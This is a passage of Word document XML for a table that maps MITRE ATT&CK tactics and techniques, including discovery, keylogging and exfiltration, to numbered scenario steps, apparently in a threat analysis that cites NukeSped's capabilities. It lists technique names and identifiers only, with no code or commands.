                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CCFFA45" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51C1316F" w14:textId="7C93DA2C" w:rsidR="007E7137" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B925FA3" w14:textId="4373F677" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="396BFB22" w14:textId="189ED6BE" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2] Scenario 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="65CCF9C4" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C4335FE" w14:textId="053E0D54" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="297B269E" w14:textId="4E7D0EE8" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="748550F7" w14:textId="2DB5AD69" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1057 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Process Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="397FFE34" w14:textId="74B6C89E" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E47EF12" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28AB921B" w14:textId="2DCA52E3" w:rsidR="007E7137" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5910E65B" w14:textId="284858B1" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78621503" w14:textId="76741055" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2] Scenario 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D24" w:rsidRPr="00646EAA" w14:paraId="18D4DE15" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E976D69" w14:textId="30C1E0AE" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="224D3DBF" w14:textId="77777777" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">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632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="084691BF" w14:textId="77777777" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Data Obfuscation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1651F932" w14:textId="4ADB7383" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00084987">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61D1BE77" w14:textId="77777777" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4684CA20" w14:textId="77777777" w:rsidR="00C03D24" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F4B00DE" w14:textId="686FDFAC" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B6D3D49" w14:textId="4F87F256" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D24" w:rsidRPr="00646EAA" w14:paraId="76A21926" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="395886D3" w14:textId="49336651" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1439132A" w14:textId="77777777" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">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632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CA0E2CF" w14:textId="77777777" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Application Layer Protocol : Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="732A1402" w14:textId="60743B37" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00084987">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="304E97D3" w14:textId="77777777" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5223404F" w14:textId="77777777" w:rsidR="00C03D24" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D66FB8E" w14:textId="2153BB98" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62CD3CCB" w14:textId="77777777" w:rsidR="00C03D24" w:rsidRPr="00646EAA" w:rsidRDefault="00C03D24" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00084987" w:rsidRPr="00646EAA" w14:paraId="7432EACC" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0396C0C7" w14:textId="20234D0E" w:rsidR="00084987" w:rsidRPr="00646EAA" w:rsidRDefault="00084987" w:rsidP="00084987">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="496E4D56" w14:textId="4A8EE89F" w:rsidR="00084987" w:rsidRPr="00646EAA" w:rsidRDefault="00084987" w:rsidP="00084987">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>00</w:t>
            </w:r>
            <w:r w:rsidR="002F2A0D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>09</w:t>
            </w:r>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002F2A0D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2799BB2E" w14:textId="655100B6" w:rsidR="00084987" w:rsidRPr="00646EAA" w:rsidRDefault="002F2A0D" w:rsidP="00084987">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1056.001</w:t>
            </w:r>
            <w:r w:rsidR="00084987" w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00084987" w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Input Capture : Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FAE8C82" w14:textId="1FA76C82" w:rsidR="00084987" w:rsidRPr="00646EAA" w:rsidRDefault="00084987" w:rsidP="00084987">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="765124ED" w14:textId="77777777" w:rsidR="00084987" w:rsidRPr="00646EAA" w:rsidRDefault="00084987" w:rsidP="00084987">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22027FCD" w14:textId="219AF811" w:rsidR="00084987" w:rsidRDefault="00084987" w:rsidP="00084987">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54ED9DEF" w14:textId="4BEE2952" w:rsidR="00084987" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00084987">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AD0B816" w14:textId="519E4BFB" w:rsidR="00084987" w:rsidRPr="00646EAA" w:rsidRDefault="00084987" w:rsidP="00084987">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="002F2A0D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="002F2A0D" w:rsidRPr="002F2A0D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Mitre Attack Tactics and Techniques</w:t>
            </w:r>
            <w:r w:rsidR="002F2A0D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> describing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002F2A0D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Nukesped</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002F2A0D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="52929CAA" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="606686E6" w14:textId="600E48DC" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="002F2A0D" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="585209E2" w14:textId="5585F29A" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="002F2A0D" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E520542" w14:textId="44772CAA" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="002F2A0D" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
